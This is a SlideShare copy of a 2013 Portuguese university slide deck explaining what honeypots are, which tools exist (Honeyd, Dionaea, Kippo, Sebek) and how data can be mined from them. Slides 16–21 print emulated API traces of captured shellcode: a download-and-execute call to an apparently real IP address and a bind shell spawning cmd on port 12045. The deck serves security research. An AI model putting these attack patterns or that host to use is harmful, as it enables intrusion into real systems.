SlideShare uma empresa Scribd logo
1 de 23
Baixar para ler offline
UNIVERSIDADE PRESBITERIANA MACKENZIE
Programa de Pós Graduação em Engenharia Elétrica
Laboratório de Computação Natural - LCoN
Honeypots: o que são, para que servem e
como extrair informações
Pedro H. Matheus
phmatheus@msn.com
UNIVERSIDADE PRESBITERIANA MACKENZIE
Programa de Pós Graduação em Engenharia Elétrica
Laboratório de Computação Natural - LCoN
• Agenda
• O que são Honeypots
• Para que servem
• Que informações podem ser extraídas ?
3Setembro / 2013phmatheus@msn.com
Honeypot
4Setembro / 2013phmatheus@msn.com
• Honeypots são sistemas computacionais cujo
objetivo é ter falhas de segurança para serem
atacadas e exploradas
O que são Honeypots
5Setembro / 2013phmatheus@msn.com
• Baixa Interatividade
• Média Interatividade
• Alta Interatividade
Honeypot
6Setembro / 2013phmatheus@msn.com
• Honeyd
– É um pequeno programa que cria hosts virtuais na
rede, os hosts podem ser configurados para executar
serviços arbitrarios, a suas caracteristicas podem ser
adaptadas para simularem certos sistemas
operacionais.
• SpamTrap
– É um servidor de e-mail criado não para comunicação
de e-mails mas, para ser explorado por spammers
para enviar e-mails, esse servidor não encaminha o e-
mail enviado para o destinatário, apenas armazena o
e-mail para analise posterior.
Baixa Interatividade
7Setembro / 2013phmatheus@msn.com
• Dionaea
É uma evolução do Nepentes com suporte a IPV6
e um novo meio de se ampliar a base de
conhecimento que anteriormente era escrita em
c++ agora é escrita em python possibilitando que
uma gama maior de programadores criem e
expandam a base de conhecimento conforme
suas necessidades.
Média Interatividade
• Nepenthes
Nepenthes emula as vulnerabilidades para a coleta de
informações sobre potenciais ataques é utilizado uma base de
conhecimento sobre as falhas para interagir com
os atacantes, com o objetivo de obter o artefato malicioso.
8Setembro / 2013phmatheus@msn.com
• Kippo
– Honeypot que simula o serviço de ssh, coletando
informações de ataques de brute-force, e
posteriormente os comandos enviados pelo
atacante.
https://code.google.com/p/kippo/
Média Interatividade
9Setembro / 2013phmatheus@msn.com
• Qebek
– Modificação do QEMU para monitorar todas as
chamadas de sistema do Windows, permitindo
analisar, depurar e monitorar a execução de ataques e
de artefatos maliciosos.
• Sebek
– É um modulo do kernel instalado no Windows com o
proposito de coletar informações sobre os artefatos
maliciosos e os ataques contra os sistemas, ele
permite a coleta de informações desde as teclas
pressionadas até informações criptografadas.
Alta Interatividade
10Setembro / 2013phmatheus@msn.com
O Fluxo de um ataque
Atacante Honeypot
File System
Base de Dados
Binarios
BitStream
Sniffer
11Setembro / 2013phmatheus@msn.com
• Uso dos dados de rede bruto para extração de
informações
• Estatística (Cukier et al. 2006)
• Associação (Ohrui et al. 2010)
• Agrupamento (Ghourabi et al. 2010)
• Correlação com SVM (Song et al. 2011)
• Longest Common Substring (Thakar et al. 2005)
• Redes Neurais MLP e KNN (Grégio et al. 2007)
Extração de informação de Honeypots
12Setembro / 2013phmatheus@msn.com
• O que todos esses trabalhos trazem em
comum é que utilizam os dados de rede para
gerar as estatísticas, para efetuar o
agrupamento, para criar as assinaturas e os
padrões dos detectores de intrusão.
Extração de informação de Honeypots
13Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
Base de Dados
14Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
Binarios
15Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
BitStream
16Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
[
{
"call": "LoadLibraryA",
"args" : [
"urlmon"
],
"return" : "0x7df20000"
},
{
"call": "URLDownloadToFile",
"args" : [
"",
"http://189.29.132.79:6402/dkqc",
"x.",
"0",
"0"
],
"return": "0"
},
{
"call": "LoadLibraryA",
"args" : [
"x."
],
"return" :
"0x00000000"
},
{
"call": "ExitThread",
"args" : [
"0"
],
"return": "0"
}
]
17Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
[
{
"call": "GetProcAddress",
"args" : [
"",
"CreateProcessA"
],
"return" : "0x7c802367"
},
{
"call": "GetProcAddress",
"args" : [
"",
"ExitThread"
],
"return" : "0x7c80c058"
},
{
"call": "GetProcAddress",
"args" : [
"",
"LoadLibraryA"
],
"return" : "0x7c801d77"
},
{
"call": "LoadLibraryA",
"args" : [
"ws2_32"
],
"return" : "0x71a10000"
},
18Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"call": "GetProcAddress",
"args" : [
"",
"WSASocketA"
],
"return" : "0x71a18769"
},
{
"call": "GetProcAddress",
"args" : [
"",
"bind"
],
"return" : "0x71a13e00"
},
{
"call": "GetProcAddress",
"args" : [
"",
"listen"
],
"return" : "0x71a188d3"
},
{
"call": "GetProcAddress",
"args" : [
"",
"accept"
],
"return" : "0x71a21028"
},
19Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"call": "GetProcAddress",
"args" : [
"",
"closesocket"
],
"return" : "0x71a19639"
},
{
"call": "WSASocket",
"args" : [
"2",
"1",
"0",
"0",
"0",
"0"
],
"return": "66"
},
{
"call": "bind",
"args" : [
"66",
{
"sin_family" : "2",
"sin_port" : "12045",
"sin_addr" : {
"s_addr" : "0.0.0.0"
},
"sin_zero" : " "
},
"16"
],
"return": "0"
},
20Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"call": "listen",
"args" : [
"66",
"1"
],
"return": "0"
},
{
"call": "accept",
"args" : [
"66",
{
},
""
],
"return": "68"
},
{
"call": "CreateProcess",
"args" : "", "cmd", "", "","1","0", "", "",
{
"cb" : "0",
"lpReserved" : "0",
"lpDesktop" : "0",
"lpTitle" : "0",
"dwX" : "0",
"dwY" : "0",
"dwXSize" : "0",
"dwYSize" : "0",
"dwXCountChars" : "0",
"dwYCountChars" : "0",
"dwFillAttribute" : "0",
"dwFlags" : "0",
"wShowWindow" : "0",
"cbReserved2" : "0",
"lpReserved2" : "0",
"hStdInput" : "68",
"hStdOutput" : "68",
"hStdError" : "68"
},
21Setembro / 2013phmatheus@msn.com
Que informações podem ser extraídas ?
{
"hProcess" : "4711",
"hThread" : "4712",
"dwProcessId" : "4712",
"dwThreadId" : "4714"
}
],
"return": "-1"
},
{
"call": "closesocket",
"args" : [
"68"
],
"return": "0"
},
{
"call": "closesocket",
"args" : [
"66"
],
"return": "0"
},
{
"call": "ExitThread",
"args" : [
"0"
],
"return": "0"
}
]
22Setembro / 2013phmatheus@msn.com
Dúvidas
23Setembro / 2013phmatheus@msn.com
• M. Cukier, R. Berthier, S. Panjwani, and S. Tan, “A statistical analysis of attack data to separate
attacks,” in Dependable Systems and Networks, 2006. DSN 2006. International Conference on,
2006, pp. 383–392.
• M. Ohrui, H. Kikuchi, and M. Terada, “Mining association rules consisting of download servers from
distributed honeypot observation,” in Network-Based Information Systems (NBiS), 2010 13th
International Conference on, 2010, pp. 541–545.
• X. Tang, “The generation of attack signatures based on virtual honeypots,” in Parallel and
Distributed Computing, Applications and Technologies (PDCAT), 2010 International Conference on,
2010, pp. 435–439.
• A. Ghourabi, T. Abbes, and A. Bouhoula, “Data analyzer based on data mining for honeypot router,”
in Computer Systems and Applications (AICCSA), 2010 IEEE/ACS International Conference on, 2010,
pp. 1–6.
• J. Song, H. Takakura, Y. Okabe, and Y. Kwon, “Correlation analysis between honeypot data and ids
alerts using one-class svm,” Intrusion Detection Systems, In Tech, pp. 173–193, 2011.
• U. Thakar, S. Varma, and A. Ramani, “Honeyanalyzer–analysis and extraction of intrusion detection
patterns & signatures using honeypot,” in Proceedings of the Second International Conference on
Innovations in Information Technology, 2005.
• A. Grégio, R. Santos, and A. Montes, “Evaluation of data mining techniques for suspicious network
activity classification using honeypots data,” in Defense and Security Symposium. International
Society for Optics and Photonics, 2007, pp. 657 006–657 006.
• S. Kaiser, “Biclustering: Methods, Software and Application”, Munchen 2011, Disponível em:
http://edoc.ub.uni-muenchen.de/13073/1/Kaiser_Sebastian.pdf
Referências

Mais conteúdo relacionado

Semelhante a Honeypots: o que são, para que servem e como extrair informações

Palestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslidesharePalestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslidesharepccdias
 
Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Tiago Tavares
 
Palestra cnasi 2013 s.video
Palestra cnasi 2013 s.videoPalestra cnasi 2013 s.video
Palestra cnasi 2013 s.videoAndre Takegawa
 
BigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenhariaBigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenhariaAlessandro Binhara
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
BIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  AplicaçõesBIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  AplicaçõesAlessandro Binhara
 
Internet, intranet, extranet
Internet, intranet, extranetInternet, intranet, extranet
Internet, intranet, extranetPricila Yessayan
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart CitiesAWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart CitiesAmazon Web Services LATAM
 
Aula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesAula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesCarlos Veiga
 
Big Data e oportunidades de negócios
Big Data e oportunidades de negóciosBig Data e oportunidades de negócios
Big Data e oportunidades de negóciosLaboratorium
 
Palestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdfPalestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdfGustavo Ferreira Palma
 
artigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redesartigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redesmauriciomoda
 
Análise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o WiresharkAnálise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o WiresharkIgor Bruno
 

Semelhante a Honeypots: o que são, para que servem e como extrair informações (20)

Bigadata casese opotunidades
Bigadata casese opotunidadesBigadata casese opotunidades
Bigadata casese opotunidades
 
Palestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslidesharePalestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
Palestra big data_e_mineracao_dedados_5agosto13-versaoslideshare
 
Inf seg redinf_semana5
Inf seg redinf_semana5Inf seg redinf_semana5
Inf seg redinf_semana5
 
Bridges Virtuais
Bridges VirtuaisBridges Virtuais
Bridges Virtuais
 
Fundamentos de Segurança da Informação
Fundamentos de Segurança da InformaçãoFundamentos de Segurança da Informação
Fundamentos de Segurança da Informação
 
Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016
 
Palestra cnasi 2013 s.video
Palestra cnasi 2013 s.videoPalestra cnasi 2013 s.video
Palestra cnasi 2013 s.video
 
BigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenhariaBigData e internte das coisas aplicada a engenharia
BigData e internte das coisas aplicada a engenharia
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
BIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  AplicaçõesBIG DATA & IoT: Tecnologias e  Aplicações
BIG DATA & IoT: Tecnologias e  Aplicações
 
Desafios do IoT
Desafios do IoTDesafios do IoT
Desafios do IoT
 
Internet, intranet, extranet
Internet, intranet, extranetInternet, intranet, extranet
Internet, intranet, extranet
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart CitiesAWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
AWS Initiate - AWS & IoT (Internet das Coisas) - Smart Cities
 
Aula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesAula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de Ataques
 
Big Data e oportunidades de negócios
Big Data e oportunidades de negóciosBig Data e oportunidades de negócios
Big Data e oportunidades de negócios
 
Mashup
MashupMashup
Mashup
 
Palestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdfPalestra Edge Computing Sistemas Embarcados.pdf
Palestra Edge Computing Sistemas Embarcados.pdf
 
artigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redesartigo ferramentas de gerenciamento de redes
artigo ferramentas de gerenciamento de redes
 
Análise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o WiresharkAnálise de Tráfego da Rede Utilizando o Wireshark
Análise de Tráfego da Rede Utilizando o Wireshark
 

Mais de LCoN Mackenzie

Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...LCoN Mackenzie
 
Reconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais ArtificiaisReconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais ArtificiaisLCoN Mackenzie
 
Processamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas NaturaisProcessamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas NaturaisLCoN Mackenzie
 
Navegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes DinâmicosNavegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes DinâmicosLCoN Mackenzie
 
Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"LCoN Mackenzie
 
Metalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologiesMetalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologiesLCoN Mackenzie
 
Obtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de ClassificadoresObtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de ClassificadoresLCoN Mackenzie
 

Mais de LCoN Mackenzie (7)

Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
Utilizando Medidas de Centralidade na Extração de Palavras-Chave de Grafos Te...
 
Reconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais ArtificiaisReconhecimento de alimentos utilizando Redes Neurais Artificiais
Reconhecimento de alimentos utilizando Redes Neurais Artificiais
 
Processamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas NaturaisProcessamento de Informação em Sistemas Naturais
Processamento de Informação em Sistemas Naturais
 
Navegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes DinâmicosNavegacao de Robótica Autônoma em Ambientes Dinâmicos
Navegacao de Robótica Autônoma em Ambientes Dinâmicos
 
Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"Excerpts from Darwin's "On the Origin of Species"
Excerpts from Darwin's "On the Origin of Species"
 
Metalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologiesMetalearning: a survey of trends and technologies
Metalearning: a survey of trends and technologies
 
Obtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de ClassificadoresObtenção de Combinação Ótima de Classificadores
Obtenção de Combinação Ótima de Classificadores
 

Último

apostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médioapostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médiorosenilrucks
 
o ciclo do contato Jorge Ponciano Ribeiro.pdf
o ciclo do contato Jorge Ponciano Ribeiro.pdfo ciclo do contato Jorge Ponciano Ribeiro.pdf
o ciclo do contato Jorge Ponciano Ribeiro.pdfCamillaBrito19
 
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...azulassessoria9
 
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2Maria Teresa Thomaz
 
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfCurrículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfTutor de matemática Ícaro
 
Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)ElliotFerreira
 
BNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimentoBNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimentoGentil Eronides
 
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptxSlides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptxLuizHenriquedeAlmeid6
 
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...azulassessoria9
 
planejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdfplanejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdfmaurocesarpaesalmeid
 
Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......suporte24hcamin
 
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdfPROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdfHELENO FAVACHO
 
PRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdf
PRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdfPRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdf
PRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdfprofesfrancleite
 
Historia da Arte europeia e não só. .pdf
Historia da Arte europeia e não só. .pdfHistoria da Arte europeia e não só. .pdf
Historia da Arte europeia e não só. .pdfEmanuel Pio
 
DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...
DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...
DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...IsabelPereira2010
 
"É melhor praticar para a nota" - Como avaliar comportamentos em contextos de...
"É melhor praticar para a nota" - Como avaliar comportamentos em contextos de..."É melhor praticar para a nota" - Como avaliar comportamentos em contextos de...
"É melhor praticar para a nota" - Como avaliar comportamentos em contextos de...Rosalina Simão Nunes
 
2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO
2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO
2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSOLeloIurk1
 
CRUZADINHA - Leitura e escrita dos números
CRUZADINHA   -   Leitura e escrita dos números CRUZADINHA   -   Leitura e escrita dos números
CRUZADINHA - Leitura e escrita dos números Mary Alvarenga
 
Considere a seguinte situação fictícia: Durante uma reunião de equipe em uma...
Considere a seguinte situação fictícia:  Durante uma reunião de equipe em uma...Considere a seguinte situação fictícia:  Durante uma reunião de equipe em uma...
Considere a seguinte situação fictícia: Durante uma reunião de equipe em uma...azulassessoria9
 
Slides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptxSlides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptxMauricioOliveira258223
 

Último (20)

apostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médioapostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médio
 
o ciclo do contato Jorge Ponciano Ribeiro.pdf
o ciclo do contato Jorge Ponciano Ribeiro.pdfo ciclo do contato Jorge Ponciano Ribeiro.pdf
o ciclo do contato Jorge Ponciano Ribeiro.pdf
 
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: COMUNICAÇÃO ASSERTIVA E INTERPESS...
 
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
 
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfCurrículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
 
Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)
 
BNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimentoBNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimento
 
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptxSlides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
 
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
 
planejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdfplanejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdf
 
Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......
 
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdfPROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
 
PRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdf
PRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdfPRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdf
PRÉDIOS HISTÓRICOS DE ASSARÉ Prof. Francisco Leite.pdf
 
Historia da Arte europeia e não só. .pdf
Historia da Arte europeia e não só. .pdfHistoria da Arte europeia e não só. .pdf
Historia da Arte europeia e não só. .pdf
 
DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...
DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...
DeClara n.º 75 Abril 2024 - O Jornal digital do Agrupamento de Escolas Clara ...
 
"É melhor praticar para a nota" - Como avaliar comportamentos em contextos de...
"É melhor praticar para a nota" - Como avaliar comportamentos em contextos de..."É melhor praticar para a nota" - Como avaliar comportamentos em contextos de...
"É melhor praticar para a nota" - Como avaliar comportamentos em contextos de...
 
2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO
2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO
2° ANO - ENSINO FUNDAMENTAL ENSINO RELIGIOSO
 
CRUZADINHA - Leitura e escrita dos números
CRUZADINHA   -   Leitura e escrita dos números CRUZADINHA   -   Leitura e escrita dos números
CRUZADINHA - Leitura e escrita dos números
 
Considere a seguinte situação fictícia: Durante uma reunião de equipe em uma...
Considere a seguinte situação fictícia:  Durante uma reunião de equipe em uma...Considere a seguinte situação fictícia:  Durante uma reunião de equipe em uma...
Considere a seguinte situação fictícia: Durante uma reunião de equipe em uma...
 
Slides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptxSlides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptx
 

Honeypots: o que são, para que servem e como extrair informações

  • 1. UNIVERSIDADE PRESBITERIANA MACKENZIE Programa de Pós Graduação em Engenharia Elétrica Laboratório de Computação Natural - LCoN Honeypots: o que são, para que servem e como extrair informações Pedro H. Matheus phmatheus@msn.com
  • 2. UNIVERSIDADE PRESBITERIANA MACKENZIE Programa de Pós Graduação em Engenharia Elétrica Laboratório de Computação Natural - LCoN • Agenda • O que são Honeypots • Para que servem • Que informações podem ser extraídas ?
  • 4. 4Setembro / 2013phmatheus@msn.com • Honeypots são sistemas computacionais cujo objetivo é ter falhas de segurança para serem atacadas e exploradas O que são Honeypots
  • 5. 5Setembro / 2013phmatheus@msn.com • Baixa Interatividade • Média Interatividade • Alta Interatividade Honeypot
  • 6. 6Setembro / 2013phmatheus@msn.com • Honeyd – É um pequeno programa que cria hosts virtuais na rede, os hosts podem ser configurados para executar serviços arbitrarios, a suas caracteristicas podem ser adaptadas para simularem certos sistemas operacionais. • SpamTrap – É um servidor de e-mail criado não para comunicação de e-mails mas, para ser explorado por spammers para enviar e-mails, esse servidor não encaminha o e- mail enviado para o destinatário, apenas armazena o e-mail para analise posterior. Baixa Interatividade
  • 7. 7Setembro / 2013phmatheus@msn.com • Dionaea É uma evolução do Nepentes com suporte a IPV6 e um novo meio de se ampliar a base de conhecimento que anteriormente era escrita em c++ agora é escrita em python possibilitando que uma gama maior de programadores criem e expandam a base de conhecimento conforme suas necessidades. Média Interatividade • Nepenthes Nepenthes emula as vulnerabilidades para a coleta de informações sobre potenciais ataques é utilizado uma base de conhecimento sobre as falhas para interagir com os atacantes, com o objetivo de obter o artefato malicioso.
  • 8. 8Setembro / 2013phmatheus@msn.com • Kippo – Honeypot que simula o serviço de ssh, coletando informações de ataques de brute-force, e posteriormente os comandos enviados pelo atacante. https://code.google.com/p/kippo/ Média Interatividade
